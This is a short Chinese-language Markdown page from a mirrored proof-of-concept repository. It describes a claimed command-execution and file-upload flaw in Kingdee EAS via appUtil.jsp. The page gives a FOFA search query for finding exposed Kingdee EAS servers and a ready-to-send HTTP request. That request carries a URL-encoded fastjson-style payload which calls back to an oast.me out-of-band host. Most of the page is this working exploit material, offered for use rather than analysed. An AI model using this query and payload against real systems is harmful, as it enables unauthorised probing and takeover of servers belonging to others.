admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-08-12 11:06:19 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/金蝶/金蝶EAS存在appUtil.jsp命令执行漏洞.md

28 lines
847 B
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# 金蝶EAS存在appUtil.jsp命令执行漏洞
金蝶EAS和金蝶EAS Cloud在多个版本中存在文件上传漏洞未经授权的攻击者可以通过特制的请求包或上传恶意的webshell文件从而进行远程代码执行控制服务器。
## fofa
```javascript
app="Kingdee-EAS"
```
## poc
```javascript
GET /easportal/tools/appUtil.jsp?list=%7B%22x%22%3A%7B%22%40type%22%3A%22java.net.Inet4Address%22%2C%22val%22%3A%22csbs1ru8ki46d67eiob0ywz51btedcjtj.oast.me%22%7D%7D HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate
```
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411071131958.webp)
## 漏洞来源
- https://mp.weixin.qq.com/s/g7XvKIKPQf35z4IPt5i8iA
Reference in New Issue Copy Permalink